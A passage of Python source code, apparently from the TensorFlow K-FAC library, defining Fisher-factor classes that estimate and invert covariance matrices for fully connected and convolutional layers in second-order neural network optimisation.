def make_covariance_update_op(self, ema_decay, ema_weight, should_write=True):
filter_height, filter_width, _, _ = self._filter_shape
# TODO(b/64144716): there is potential here for a big savings in terms
# of memory use.
if self._dilations is None:
rates = (1, 1, 1, 1)
else:
rates = tuple(self._dilations)
self._patches = []
for tower in range(self._num_towers):
with maybe_place_on_device(self._get_data_device(tower)):
patches = tf.extract_image_patches(
self._inputs[tower],
ksizes=[1, filter_height, filter_width, 1],
strides=self._strides,
rates=rates,
padding=self._padding)
if self._patch_mask is not None:
assert self._patch_mask.shape == self._filter_shape[0:-1]
# This should work as intended due to broadcasting.
patches *= self._patch_mask
if self._has_bias:
patches = append_homog(patches)
self._patches.append(patches)
return super(ConvDiagonalFactor, self).make_covariance_update_op(
ema_decay, ema_weight, should_write=should_write)
def _compute_new_cov(self, source, tower):
patches = self._patches[tower]
batch_size = utils.get_shape(patches)[0]
outputs_grad = self._outputs_grads[source][tower]
new_cov = self._convdiag_sum_of_squares(patches, outputs_grad)
new_cov /= tf.cast(batch_size, new_cov.dtype)
return new_cov
def _convdiag_sum_of_squares(self, patches, outputs_grad):
# This computes the sum of the squares of the per-training-case "gradients".
# It does this simply by computing a giant tensor containing all of these,
# doing an entry-wise square, and them summing along the batch dimension.
case_wise_gradients = tf.einsum("bijk,bijl->bkl", patches, outputs_grad)
return tf.reduce_sum(tf.square(case_wise_gradients), axis=0)
def _get_data_device(self, tower):
return self._inputs[tower].device
class FullyConnectedKroneckerFactor(DenseSquareMatrixFactor):
"""Kronecker factor for the input or output side of a fully-connected layer.
"""
def __init__(self,
tensors,
has_bias=False):
"""Instantiate FullyConnectedKroneckerFactor.
Args:
tensors: List of list of Tensors, each of shape [batch_size, n]. The
Tensors are typically either a layer's inputs or its output's gradients.
The first list index is source, the second is tower.
has_bias: bool. If True, append '1' to each row.
"""
# The tensor argument is either a tensor of input activations or a tensor of
# output pre-activation gradients.
self._has_bias = has_bias
self._tensors = tensors
super(FullyConnectedKroneckerFactor, self).__init__()
@property
def _var_scope(self):
return "ff_fckron_" + scope_string_from_params(
tuple(nest.flatten(self._tensors)) + (self._has_bias,))
@property
def _cov_shape(self):
size = self._tensors[0][0].shape[1] + self._has_bias
return [size, size]
@property
def _num_sources(self):
return len(self._tensors)
@property
def _num_towers(self):
return len(self._tensors[0])
@property
def _dtype(self):
return self._tensors[0][0].dtype
def _partial_batch_size(self, source=0, tower=0):
return utils.get_shape(self._tensors[source][tower])[0]
def _compute_new_cov(self, source, tower):
tensor = self._tensors[source][tower]
if self._has_bias:
tensor = append_homog(tensor)
return compute_cov(tensor)
def _get_data_device(self, tower):
return self._tensors[0][tower].device
class ConvInputKroneckerFactor(DenseSquareMatrixFactor):
r"""Kronecker factor for the input side of a convolutional layer.
Estimates E[ a a^T ] where a is the inputs to a convolutional layer given
example x. Expectation is taken over all examples and locations.
Equivalent to Omega in https://arxiv.org/abs/1602.01407 for details. See
Section 3.1 Estimating the factors.
"""
def __init__(self,
inputs,
filter_shape,
padding,
strides=None,
dilation_rate=None,
data_format=None,
extract_patches_fn=None,
has_bias=False,
sub_sample_inputs=None,
sub_sample_patches=None,
patch_mask=None):
"""Initializes ConvInputKroneckerFactor.
Args:
inputs: List of Tensors of shape [batch_size, ..spatial_input_size..,
in_channels]. Inputs to layer. List index is tower.
filter_shape: List of ints. Contains [..spatial_filter_size..,
in_channels, out_channels]. Shape of convolution kernel.
padding: str. Padding method for layer. "SAME" or "VALID".
strides: List of ints or None. Contains [..spatial_filter_strides..] if
'extract_patches_fn' is compatible with tf.nn.convolution(), else
[1, ..spatial_filter_strides, 1].
dilation_rate: List of ints or None. Rate for dilation along each spatial
dimension if 'extract_patches_fn' is compatible with
tf.nn.convolution(), else [1, ..spatial_dilation_rates.., 1].
data_format: str or None. Format of input data.
extract_patches_fn: str or None. Name of function that extracts image
patches. One of "extract_convolution_patches", "extract_image_patches",
"extract_pointwise_conv2d_patches".
has_bias: bool. If True, append 1 to in_channel.
sub_sample_inputs: `bool`. If True, then subsample the inputs from which
the image patches are extracted. (Default: None)
sub_sample_patches: `bool`, If `True` then subsample the extracted
patches. (Default: None)
patch_mask: Tensor of shape [kernel_height, kernel_width, in_channels]
or None. If not None this is multiplied against the extracted patches
Tensor (broadcasting along the batch dimension) before statistics are
computed. (Default: None)
"""
self._inputs = inputs
self._filter_shape = filter_shape
self._strides = strides
self._padding = padding
self._dilation_rate = dilation_rate
self._data_format = data_format
self._extract_patches_fn = extract_patches_fn
self._has_bias = has_bias
if sub_sample_inputs is None:
self._sub_sample_inputs = _SUB_SAMPLE_INPUTS
else:
self._sub_sample_inputs = sub_sample_inputs
if sub_sample_patches is None:
self._sub_sample_patches = _SUB_SAMPLE_PATCHES
else:
self._sub_sample_patches = sub_sample_patches
self._patch_mask = patch_mask
super(ConvInputKroneckerFactor, self).__init__()
@property
def _var_scope(self):
return "ff_convinkron_" + scope_string_from_params(
tuple(self._inputs) +
tuple((self._filter_shape, self._strides, self._padding,
self._dilation_rate, self._data_format, self._has_bias,
self._patch_mask)))
@property
def _cov_shape(self):
spatial_filter_shape = self._filter_shape[0:-2]
in_channels = self._filter_shape[-2]
size = np.prod(spatial_filter_shape) * in_channels + self._has_bias
return [size, size]
@property
def _num_sources(self):
return 1
@property
def _num_towers(self):
return len(self._inputs)
@property
def _dtype(self):
return self._inputs[0].dtype
def _partial_batch_size(self, source=0, tower=0):
assert source == 0
return utils.get_shape(self._inputs[tower])[0]
def _compute_new_cov(self, source, tower):
assert source == 0
inputs = self._inputs[tower]
if self._sub_sample_inputs:
batch_size = utils.get_shape(inputs)[0]
# computes: int(math.ceil(batch_size * _INPUTS_TO_EXTRACT_PATCHES_FACTOR))
new_size = tf.cast(
tf.ceil(tf.multiply(tf.cast(batch_size, dtype=tf.float32),
_INPUTS_TO_EXTRACT_PATCHES_FACTOR)),
dtype=tf.int32)
inputs = _random_tensor_gather(inputs, new_size)
# TODO(b/64144716): there is potential here for a big savings in terms of
# memory use.
if self._extract_patches_fn in [None, "extract_convolution_patches"]:
patches = utils.extract_convolution_patches(
inputs,
self._filter_shape,
padding=self._padding,
strides=self._strides,
dilation_rate=self._dilation_rate,
data_format=self._data_format)
elif self._extract_patches_fn == "extract_image_patches":
assert inputs.shape.ndims == 4
assert len(self._filter_shape) == 4
assert len(self._strides) == 4, self._strides
if self._dilation_rate is None:
rates = [1, 1, 1, 1]
else:
rates = self._dilation_rate
assert len(rates) == 4
assert rates[0] == rates[-1] == 1
patches = tf.extract_image_patches(
inputs,
ksizes=[1] + list(self._filter_shape[0:-2]) + [1],
strides=self._strides,
rates=rates,
padding=self._padding)
elif self._extract_patches_fn == "extract_pointwise_conv2d_patches":
assert self._strides in [None, [1, 1, 1, 1], (1, 1, 1, 1)]
assert self._filter_shape[0] == self._filter_shape[1] == 1
patches = utils.extract_pointwise_conv2d_patches(
inputs, self._filter_shape, data_format=None)
else:
raise NotImplementedError(self._extract_patches_fn)
if self._patch_mask is not None:
assert self._patch_mask.shape == self._filter_shape[0:-1]
# This should work as intended due to broadcasting.
patches *= tf.reshape(self._patch_mask, [-1])
flatten_size = np.prod(self._filter_shape[0:-1])
# patches_flat below is the matrix [[A_l]] from the KFC paper (tilde
# omitted over A for clarity). It has shape M|T| x J|Delta| (eq. 14),
# where M = minibatch size, |T| = number of spatial locations,
# |Delta| = number of spatial offsets, and J = number of input maps
# for convolutional layer l.
patches_flat = tf.reshape(patches, [-1, flatten_size])
# We append a homogenous coordinate to patches_flat if the layer has
# bias parameters. This gives us [[A_l]]_H from the paper.
if self._sub_sample_patches:
patches_flat = _subsample_patches(patches_flat)
if self._has_bias:
patches_flat = append_homog(patches_flat)
# We call compute_cov without passing in a normalizer. compute_cov uses
# the first dimension of patches_flat i.e. M|T| as the normalizer by
# default. Hence we end up computing 1/M|T| * [[A_l]]^T [[A_l]], with
# shape J|Delta| x J|Delta|. This is related to hat{Omega}_l from
# the paper but has a different scale here for consistency with
# ConvOutputKroneckerFactor.
# (Tilde omitted over A for clarity.)
return compute_cov(patches_flat)
def _get_data_device(self, tower):
return self._inputs[tower].device
class ConvInputMultiKF(ConvInputKroneckerFactor):
def __init__(self,
inputs,
filter_shape,
padding,
num_uses,
strides=None,
dilation_rate=None,
data_format=None,
extract_patches_fn=None,
has_bias=False,
sub_sample_inputs=None,
sub_sample_patches=None,
patch_mask=None):
super(ConvInputMultiKF, self).__init__(self,
inputs,
filter_shape,
padding,
strides=strides,
dilation_rate=dilation_rate,
data_format=data_format,
extract_patches_fn=extract_patches_fn,
has_bias=has_bias,
sub_sample_inputs=sub_sample_inputs,
sub_sample_patches=sub_sample_patches,
patch_mask=patch_mask)
self._num_uses = num_uses
def _partial_batch_size(self, source=0, tower=0):
# Note that some internal comptutations of "batch_size" done in the parent
# class won't actually be the proper batch size. Instead, they will be
# just "the thing to normalize the statistics by", essentially. This is okay
# as we don't mix the two things up.
return (super(ConvInputMultiKF, self)._partial_batch_size(source=source,
tower=tower)
// self._num_uses)
class ConvInputSUAKroneckerFactor(FisherFactor):
r"""Kronecker factor for the input side of a convolutional layer.
Assumes activations across locations are uncorrelated. Check section 4.2
Theorem 4 in https://arxiv.org/pdf/1602.01407.pdf for further details on the
assumptions. This is a computationally more efficient approximation,
especially for very wide layers.
"""
def __init__(self, inputs, filter_shape, has_bias=False):
"""Initializes ConvInputSUAKroneckerFactor.
If `ASSUME_ZERO_MEAN_ACTIVATIONS` is `True` then assumes activations
zero mean and the contribution from `M(j) M(j')` term in
Theorem 4 from https://arxiv.org/pdf/1602.01407.pdf is ignored.
Args:
inputs: List of Tensors of shape [batch_size, ..spatial_input_size..,
in_channels]. Inputs to layer. List index is tower.
filter_shape: List of ints. Contains [..spatial_filter_size..,
in_channels, out_channels]. Shape of convolution kernel.
has_bias: bool. If True, appends 1 to mean activations.
"""
self._inputs = inputs
self._filter_shape = filter_shape
self._has_bias = has_bias
self._kw_kh = np.prod(self._filter_shape[0:-2])
self._in_channels = self._filter_shape[-2]
self._matpower_by_exp_and_damping = OrderedDict() # { (float, hashable): variable }
self._matpower_registrations = set() # { (float, hashable) }
self._damping_funcs_by_id = OrderedDict() # {hashable: lambda}
self._damping_var_by_id = OrderedDict()
if not ASSUME_ZERO_MEAN_ACTIVATIONS:
self._cov_inv_mu_by_damping_id = OrderedDict()
self._rank_one_update_scale_by_damping_id = OrderedDict()
super(ConvInputSUAKroneckerFactor, self).__init__()
@property
def _var_scope(self):
return "ff_convinsuakron_" + scope_string_from_params(
tuple(self._inputs) + tuple((self._filter_shape, self._has_bias)))
@property
def _cov_shape(self):
"""Returns a list with value [in_channels, in_channels].
NOTE: This does not return the shape of the full cov matrix. But returns the
shape of the matrix which computes the covariance of the input channel
activations under the assumption mentioned in Theorem 4 in
https://arxiv.org/pdf/1602.01407.pdf. This does not include bias dimension
and also includes only the `Sigma` term from Theorem 4 in
the paper.
"""
return [self._in_channels, self._in_channels]
@property
def _num_sources(self):
return 1
@property
def _num_towers(self):
return len(self._inputs)
@property
def _dtype(self):
return self._inputs[0].dtype
@property
def mu(self):
return self._mu.value
def _partial_batch_size(self, source=0, tower=0):
assert source == 0
return utils.get_shape(self._inputs[tower])[0]
def _register_damping(self, damping_func):
damping_id = graph_func_to_id(damping_func)
if damping_id not in self._damping_funcs_by_id:
self._damping_funcs_by_id[damping_id] = damping_func
return damping_id
def get_inv_vars(self):
inv_vars = []
inv_vars.extend(self._matpower_by_exp_and_damping.values())
return inv_vars
def instantiate_cov_variables(self):
"""Makes the internal cov variable(s)."""
super(ConvInputSUAKroneckerFactor,
self).instantiate_cov_variables()
# Create variables for computing the mean activations only if
# `ASSUME_ZERO_MEAN_ACTIVATIONS` is set to `False`. Otherwise the
# contribution from the second term in equation 35 in the paper
# https://arxiv.org/pdf/1602.01407.pdf is ignored.
if not ASSUME_ZERO_MEAN_ACTIVATIONS:
with tf.variable_scope(self._var_scope):
self._mu = utils.MovingAverageVariable(
name="mu",
shape=(self._in_channels, 1), # number of input channels.
dtype=self._dtype,
initializer=tf.zeros_initializer(),
normalize_value=ZERO_DEBIAS)
self._acc_mu = utils.AccumulatorVariable(
name="acc_mu",
shape=(self._in_channels, 1),
dtype=self._dtype)
def make_covariance_update_op(self, ema_decay, ema_weight, should_write=True):
"""Constructs and returns the covariance update Op.
Args:
ema_decay: The exponential moving average decay (float or Tensor).
ema_weight: float or Tensor. The weight to put on the newly computed
values. This is typically 1.0 - ema_decay.
should_write: Python or TF bool. If True, we write the covariance to
the variable and reset the accumulator instead of just accumulating.
(Default: True)
Returns:
An Op for updating the covariance Variable referenced by _cov and possibly
updating mean activations.
"""
# The newly computed cov matrix is returned and assigned below to the
# moving average. `new_cov` is required to compute mean activations.
# Mean activations is given by last row and col of `new_cov.
# Remove the last row and col from `new_cov`.
new_cov = super(ConvInputSUAKroneckerFactor, self)._compute_total_new_cov()
new_mu = new_cov[:-1, -1:]
new_cov = new_cov[0:-1, 0:-1]
if not ASSUME_ZERO_MEAN_ACTIVATIONS:
new_cov = new_cov - tf.matmul(new_mu, new_mu, transpose_b=True)
acc_mu_op = accumulate_and_maybe_write(self._acc_mu,
self._mu,
new_mu,
ema_decay,
ema_weight,
should_write)
else:
acc_mu_op = tf.no_op()
if SUBTRACT_MEAN_CONTRIB_FROM_COV:
new_cov = new_cov - tf.matmul(new_mu, new_mu, transpose_b=True)
acc_cov_op = accumulate_and_maybe_write(self._acc_cov,
self._cov,
new_cov,
ema_decay,
ema_weight,
should_write)
return tf.group(acc_cov_op, acc_mu_op)
def _compute_new_cov(self, source, tower):
assert source == 0
inputs = self._inputs[tower]
# Reshape inputs to compute [in_channels, in_channels] shape cov.
channel_inputs = tf.reshape(inputs, shape=(-1, self._in_channels))
# Append the bias dimension as we need this to calculate mean activations.
channel_inputs = append_homog(channel_inputs)
return compute_cov(channel_inputs)
def register_matpower(self, exp, damping_func):
"""Registers a matrix power to be maintained and served on demand.
This creates a variable and signals make_inverse_update_ops to make the
corresponding update op. The variable can be read via the method
get_matpower.
Args:
exp: float. The exponent to use in the matrix power.
damping_func: A function that computes a 0-D Tensor or a float which will
be the damping value used. i.e. damping = damping_func().
"""
if exp == 1.0:
return
if exp != -1:
raise ValueError("ConvInputSUAKroneckerFactor supports only"
"matrix inversion")
damping_id = self._register_damping(damping_func)
if (exp, damping_id) not in self._matpower_registrations:
self._matpower_registrations.add((exp, damping_id))
def _compute_sm_rank_one_update_quants(self, exp, damping_id, damping_value):
"""Returns tensors to compute Fisher inv using Sherman-Morrison formula."""
cov_inv = self._matpower_by_exp_and_damping[(exp, damping_id)]
cov_inv_mu = tf.matmul(cov_inv, self.mu)
hatmu_t_cov_inv_hatmu = self._kw_kh * tf.squeeze(
tf.matmul(self.mu, cov_inv_mu, transpose_a=True))
if self._has_bias:
tildemu_t_cov_inv_tildemu = hatmu_t_cov_inv_hatmu + (1. / damping_value)
return cov_inv_mu, (1. / (1. + tildemu_t_cov_inv_tildemu))
else:
return cov_inv_mu, (1. / (1. + hatmu_t_cov_inv_hatmu))
def get_matpower(self, exp, damping_func):
# Note that this function returns a variable which gets updated by the
# inverse ops. It may be stale / inconsistent with the latest value of
# self.cov (except when exp == 1).
if exp == 1:
return self._make_cov_linear_operator(
damping=tf.cast(damping_func(), dtype=self._dtype))
elif exp == -1:
damping_id = graph_func_to_id(damping_func)
cov_inv = self._matpower_by_exp_and_damping[(exp, damping_id)]
damping_value = self._damping_var_by_id[damping_id]
# Replicates the in_channels * in_channels cov inverse matrix.
# Note that in this function the replications are not done explicitly.
# They are done using tf.linalg ops and hence they are computationally
# efficient.
quant_1 = tf.linalg.LinearOperatorKronecker([
tf.linalg.LinearOperatorFullMatrix(
cov_inv,
is_non_singular=True,
is_self_adjoint=True,
is_positive_definite=True,
is_square=True),
tf.linalg.LinearOperatorIdentity(
num_rows=self._kw_kh, dtype=self._dtype)
])
# If a bias dimension needs to be appended then we need to expand
# scaled_cov_inv_mu and assign `1` to the last dimension. Also
# we need to append inverse of damping constant (1 * 1 matrix) to
# to the replicated cov inverse matrix.
if self._has_bias:
bias_operator = tf.linalg.LinearOperatorFullMatrix(
[[1. / damping_value]],
is_non_singular=True,
is_self_adjoint=True,
is_positive_definite=True,
is_square=True)
cov_inv_kron_identity_operator = tf.linalg.LinearOperatorBlockDiag(
[quant_1, bias_operator])
if not ASSUME_ZERO_MEAN_ACTIVATIONS:
cov_inv_mu = self._cov_inv_mu_by_damping_id[damping_id]
scale = self._rank_one_update_scale_by_damping_id[damping_id]
# Compute cov_inv_mu kron 1's vec. We tile the cov_inv_mu on the last
# dim and then reshape.
mean_update = (
tf.expand_dims(
append_homog(
tf.reshape(tf.tile(cov_inv_mu, [1, self._kw_kh]), (-1,)),
homog_value=(1. / damping_value)),
axis=1))
else:
cov_inv_kron_identity_operator = quant_1
if not ASSUME_ZERO_MEAN_ACTIVATIONS:
cov_inv_mu = self._cov_inv_mu_by_damping_id[damping_id]
scale = self._rank_one_update_scale_by_damping_id[damping_id]
# Compute cov_inv_mu kron 1's vec. We tile the cov_inv_mu on the last
# dim and then reshape.
mean_update = tf.reshape(
tf.tile(cov_inv_mu, [1, self._kw_kh]), (-1, 1))
if ASSUME_ZERO_MEAN_ACTIVATIONS:
return cov_inv_kron_identity_operator
else:
# To include the contribution from the mean activations we need to
# low rank update op. Note the Sherman Morrison formula requires
# negative of (mean_update * mean_update^T) / scale term to be added.
# In order to achieve this using `LinearOperatorLowRankUpdate` set `v`
# to negative of mean update vector multiplied by scale.
return tf.linalg.LinearOperatorLowRankUpdate(
cov_inv_kron_identity_operator,
mean_update,
v=-scale * mean_update,
is_non_singular=True,
is_self_adjoint=True,
is_positive_definite=True,
is_square=True)
else:
raise ValueError("ConvInputSUAKroneckerFactor only supports"
"computing inverse of cov matrix.")
def make_inverse_update_ops(self):
"""Creates and return update ops for registered computations."""
inverse_ops = []
for (exp,
damping_id), matpower in self._matpower_by_exp_and_damping.items():
assert exp == -1
damping = tf.cast(self._damping_funcs_by_id[damping_id](), self._dtype)
damping_assign_op = utils.smart_assign(
self._damping_var_by_id[damping_id], damping)
inverse_op = utils.smart_assign(matpower,
utils.posdef_inv(self.cov, damping))
inverse_ops.append(damping_assign_op)
if not ASSUME_ZERO_MEAN_ACTIVATIONS:
with tf.control_dependencies([inverse_op]):
(cov_inv_mu,
rank_one_update_scale) = self._compute_sm_rank_one_update_quants(
exp, damping_id, damping)
inverse_ops.append(
utils.smart_assign(self._cov_inv_mu_by_damping_id[damping_id],
cov_inv_mu))
inverse_ops.append(
utils.smart_assign(
self._rank_one_update_scale_by_damping_id[damping_id],
rank_one_update_scale))
else:
inverse_ops.append(inverse_op)
return inverse_ops
def get_inverse(self, damping_func):
# Just for backwards compatibility of some old code and tests
return self.get_matpower(-1, damping_func)
def instantiate_inv_variables(self):
"""Makes the internal "inverse" variable(s)."""
for (exp, damping_id) in self._matpower_registrations:
if exp != -1.:
raise ValueError("ConvInputSUAKroneckerFactor only supports inverse"
"computation")
exp_string = scalar_or_tensor_to_string(exp)
damping_func = self._damping_funcs_by_id[damping_id]
damping_string = graph_func_to_string(damping_func)
with tf.variable_scope(self._var_scope):
matpower = tf.get_variable(
"matpower_exp{}_damp{}".format(exp_string, damping_string),
initializer=inverse_initializer,
shape=self._cov_shape,
trainable=False,
dtype=self._dtype,
use_resource=True)
assert (exp, damping_id) not in self._matpower_by_exp_and_damping
self._matpower_by_exp_and_damping[(exp, damping_id)] = matpower
self._damping_var_by_id[damping_id] = tf.get_variable(
"damping_var_{}_{}".format(exp_string, damping_string),
initializer=tf.zeros_initializer(),
shape=(),
trainable=False,
dtype=self._dtype,
use_resource=True)
if not ASSUME_ZERO_MEAN_ACTIVATIONS:
self._cov_inv_mu_by_damping_id[damping_id] = tf.get_variable(
"cov_inv_mu_{}_{}".format(exp_string, damping_string),
initializer=tf.zeros_initializer(),
shape=(self._in_channels, 1),
trainable=False,
dtype=self._dtype,
use_resource=True)
self._rank_one_update_scale_by_damping_id[damping_id] = tf.get_variable(
"rank_one_update_scale_{}_{}".format(exp_string, damping_string),
initializer=tf.zeros_initializer(),
shape=(),
trainable=False,
dtype=self._dtype,
use_resource=True)
def _make_cov_linear_operator(self, damping=None):
"""Returns cov as a linear operator.
Args:
damping: Damping value tensor. If `damping` is not None then returns
damped covariance matrix.
Returns:
tf.linalg.LinearOperator instance.
"""
if damping is not None:
cov = self.cov + damping * tf.eye(self._cov_shape[0], dtype=self._dtype)
else:
cov = self.cov
cov_operator = tf.linalg.LinearOperatorKronecker([
tf.linalg.LinearOperatorFullMatrix(
cov, is_self_adjoint=True, is_square=True),
tf.linalg.LinearOperatorIdentity(
num_rows=self._kw_kh, dtype=self._dtype)
])
if self._has_bias:
bias_value = damping if damping is not None else 0.
bias_operator = tf.linalg.LinearOperatorFullMatrix([[bias_value]],
is_self_adjoint=True,
is_square=True)
cov_operator = tf.linalg.LinearOperatorBlockDiag(
[cov_operator, bias_operator])
if ASSUME_ZERO_MEAN_ACTIVATIONS:
return cov_operator
else:
# self.mu kron 1's vec is computed below by tiling mu.
hatmu = tf.tile(self.mu, [1, self._kw_kh])
if self._has_bias:
tildemu = append_homog(tf.reshape(hatmu, (-1,)))
mean_update = tf.expand_dims(tildemu, axis=1)
else:
mean_update = tf.reshape(hatmu, (-1, 1))
return tf.linalg.LinearOperatorLowRankUpdate(
cov_operator, mean_update, is_self_adjoint=True, is_square=True)
def get_cov_as_linear_operator(self):
return self._make_cov_linear_operator()
def get_cholesky(self, damping_func):
raise NotImplementedError("ConvInputSUAKroneckerFactor does not support"
"cholesky factorization")
def get_cholesky_inverse(self, damping_func):
raise NotImplementedError("ConvInputSUAKroneckerFactor does not support"
"cholesky inverse computation")
def register_cholesky(self):
raise NotImplementedError("ConvInputSUAKroneckerFactor does not support"
"cholesky factorization")
def register_cholesky_inverse(self):
raise NotImplementedError("ConvInputSUAKroneckerFactor does not support"
"cholesky inverse computation")
def _get_data_device(self, tower):
return self._inputs[tower].device
class ConvOutputKroneckerFactor(DenseSquareMatrixFactor):
r"""Kronecker factor for the output side of a convolutional layer.
Estimates E[ ds ds^T ] where s is the preactivations of a convolutional layer
given example x and ds = (d / d s) log(p(y|x, w)). Expectation is taken over
all examples and locations.
Equivalent to Gamma in https://arxiv.org/abs/1602.01407 for details. See
Section 3.1 Estimating the factors.
"""
def __init__(self, outputs_grads, data_format=None):
"""Initializes ConvOutputKroneckerFactor.
Args:
outputs_grads: List of list of Tensors. Each Tensor is of shape
[batch_size, ..spatial_input_size.., out_channels]. First list index
is source, the second is tower.
data_format: None or str. Format of outputs_grads.
Raises:
ValueError: If channels are not final dimension.
"""
if not utils.is_data_format_channel_last(data_format):
raise ValueError("Channel must be last.")
self._out_channels = outputs_grads[0][0].shape.as_list()[-1]
self._outputs_grads = outputs_grads
super(ConvOutputKroneckerFactor, self).__init__()
@property
def _var_scope(self):
return "ff_convoutkron_" + scope_string_from_params(
nest.flatten(self._outputs_grads))
@property
def _cov_shape(self):
size = self._out_channels
return [size, size]
@property
def _num_sources(self):
return len(self._outputs_grads)
@property
def _num_towers(self):
return len(self._outputs_grads[0])
@property
def _dtype(self):
return self._outputs_grads[0][0].dtype
def _partial_batch_size(self, source=0, tower=0):
return utils.get_shape(self._outputs_grads[source][tower])[0]
def _compute_new_cov(self, source, tower):
outputs_grad = self._outputs_grads[source][tower]
# reshaped_tensor below is the matrix DS_l defined in the KFC paper
# (tilde omitted over S for clarity). It has shape M|T| x I, where
# M = minibatch size, |T| = number of spatial locations, and
# I = number of output maps for convolutional layer l.
reshaped_tensor = tf.reshape(outputs_grad, [-1, self._out_channels])
# Following the reasoning in ConvInputKroneckerFactor._compute_new_cov,
# compute_cov here returns 1/M|T| * DS_l^T DS_l = hat{Gamma}_l
# as defined in the paper, with shape I x I.
# (Tilde omitted over S for clarity.)
return compute_cov(reshaped_tensor)
def _get_data_device(self, tower):
return self._outputs_grads[0][tower].device
class ConvOutputMultiKF(ConvOutputKroneckerFactor):
def __init__(self, outputs_grads, num_uses, data_format=None):
super(ConvOutputMultiKF, self).__init__(outputs_grads,
data_format=data_format)
self._num_uses = num_uses
def _partial_batch_size(self, source=0, tower=0):
# Note that some internal comptutations of "batch_size" done in the parent
# class won't actually be the proper batch size. Instead, they will be
# just "the thing to normalize the statistics by", essentially. This is okay
# as we don't mix the two things up.
return (super(ConvOutputMultiKF, self)._partial_batch_size(source=source,
tower=tower)
// self._num_uses)
class FullyConnectedMultiKF(FullyConnectedKroneckerFactor):
"""Kronecker factor for a fully connected layer used multiple times."""
def __init__(self,
tensors,
num_uses=None,
has_bias=False):
"""Constructs a new `FullyConnectedMultiKF`.
Args:
tensors: List of list of Tensors of shape, each of shape
[num_uses * batch_size, n], and is a reshape version of a Tensor of
shape [num_uses, batch_size, n]. Each of these tensors is usually a
layer's inputs or its output's gradients. The first list index is
sources, the second is towers.
num_uses: int. The number of time-steps / uses.
has_bias: bool. If True, '1' is appended to each row.
"""
self._num_uses = num_uses
self._cov_dt1 = None
self._acc_cov_dt1 = None
self._make_cov_dt1 = False
self._option1quants_by_damping = OrderedDict()
self._option2quants_by_damping = OrderedDict()
self._option1quants_registrations = set()
self._option2quants_registrations = set()
super(FullyConnectedMultiKF, self).__init__(tensors=tensors,
has_bias=has_bias)
@property
def _num_timesteps(self):
return self._num_uses
def _partial_batch_size(self, source=0, tower=0):
total_len = utils.get_shape(self._tensors[source][tower])[0]
return total_len // self._num_timesteps
@property
def _var_scope(self):
return "ff_fc_multi_" + scope_string_from_params(
tuple(nest.flatten(self._tensors))
+ (self._num_timesteps, self._has_bias,))
def get_inv_vars(self):
inv_vars = super(FullyConnectedMultiKF, self).get_inv_vars()
inv_vars.extend(self._option1quants_by_damping.values())
inv_vars.extend(self._option2quants_by_damping.values())
return inv_vars
def make_covariance_update_op(self, ema_decay, ema_weight, should_write=True):
op = super(FullyConnectedMultiKF, self).make_covariance_update_op(
ema_decay, ema_weight, should_write=should_write)
if self._cov_dt1 is not None:
new_cov_dt1_contribs = []
for source in range(self._num_sources):
for tower in range(self._num_towers):
with maybe_place_on_device(self._get_data_device(tower)):
new_cov_dt1_contribs.append(self._compute_new_cov_dt1(source,
tower))
new_cov_dt1 = (tf.add_n(new_cov_dt1_contribs) / float(self._num_towers))
# See comments in FisherFactor.make_covariance_update_op() for details.
new_cov_dt1 = utils.all_average(new_cov_dt1)
op2 = accumulate_and_maybe_write(self._acc_cov_dt1,
self._cov_dt1,
new_cov_dt1,
ema_decay,
ema_weight,
should_write)
# TODO(b/69112164):
# It's important that _cov and _cov_dt1 remain consistent with each
# other while the inverse ops are happening. How can we ensure this?
# We will need to add explicit synchronization for this to
# work with asynchronous training.
op = tf.group(op, op2)
return op
def _compute_new_cov_dt1(self, source, tower): # pylint: disable=missing-docstring
tensor = self._tensors[source][tower]
if self._has_bias:
# This appending is technically done twice (the other time is for
# _compute_new_cov())
tensor = append_homog(tensor)
total_len = utils.get_shape(tensor)[0]
batch_size = total_len // self._num_timesteps
tensor_present = tensor[:-batch_size, :]
tensor_future = tensor[batch_size:, :]
# We specify a normalizer for this computation to ensure a PSD Fisher
# block estimate. This is equivalent to padding with zeros, as was done
# in Section B.2 of the appendix.
return compute_cov(
tensor_future, tensor_right=tensor_present, normalizer=total_len)
def _get_data_device(self, tower):
return self._tensors[0][tower].device
@property
def _vec_shape(self):
size = self._tensors[0][0].shape[1] + self._has_bias
return [size]
def get_option1quants(self, damping_func):
damping_id = graph_func_to_id(damping_func)
return self._option1quants_by_damping[damping_id]
def get_option2quants(self, damping_func):
damping_id = graph_func_to_id(damping_func)
return self._option2quants_by_damping[damping_id]
@property
def cov_dt1(self):
assert self._cov_dt1 is not None
return self._cov_dt1.value
def get_cov_vars(self):
cov_vars = super(FullyConnectedMultiKF, self).get_cov_vars()
if self._make_cov_dt1:
cov_vars += [self.cov_dt1]
return cov_vars
def register_cov_dt1(self):
self._make_cov_dt1 = True
def instantiate_cov_variables(self):
super(FullyConnectedMultiKF, self).instantiate_cov_variables()
assert self._cov_dt1 is None
if self._make_cov_dt1:
with tf.variable_scope(self._var_scope):
self._cov_dt1 = utils.MovingAverageVariable(
name="cov_dt1",
shape=self._cov_shape,
dtype=self._dtype,
initializer=tf.zeros_initializer(),
normalize_value=ZERO_DEBIAS)
self._acc_cov_dt1 = utils.AccumulatorVariable(
name="acc_cov_dt1",
shape=self._cov_shape,
dtype=self._dtype)
def register_option1quants(self, damping_func):
damping_id = self._register_damping(damping_func)
if damping_id not in self._option1quants_registrations:
self._option1quants_registrations.add(damping_id)
def register_option2quants(self, damping_func):
damping_id = self._register_damping(damping_func)
if damping_id not in self._option2quants_registrations:
self._option2quants_registrations.add(damping_id)
def instantiate_inv_variables(self):
super(FullyConnectedMultiKF, self).instantiate_inv_variables()
for damping_id in self._option1quants_registrations:
damping_func = self._damping_funcs_by_id[damping_id]
damping_string = graph_func_to_string(damping_func)
# It's questionable as to whether we should initialize with stuff like
# this at all. Ideally these values should never be used until they are
# updated at least once.
with tf.variable_scope(self._var_scope):
Lmat = tf.get_variable( # pylint: disable=invalid-name
"Lmat_damp{}".format(damping_string),
initializer=inverse_initializer,
shape=self._cov_shape,
trainable=False,
dtype=self._dtype,
use_resource=True)
psi = tf.get_variable(
"psi_damp{}".format(damping_string),
initializer=tf.ones_initializer(),
shape=self._vec_shape,
trainable=False,
dtype=self._dtype,
use_resource=True)
assert damping_id not in self._option1quants_by_damping
self._option1quants_by_damping[damping_id] = (Lmat, psi)
for damping_id in self._option2quants_registrations:
damping_func = self._damping_funcs_by_id[damping_id]
damping_string = graph_func_to_string(damping_func)
# It's questionable as to whether we should initialize with stuff like
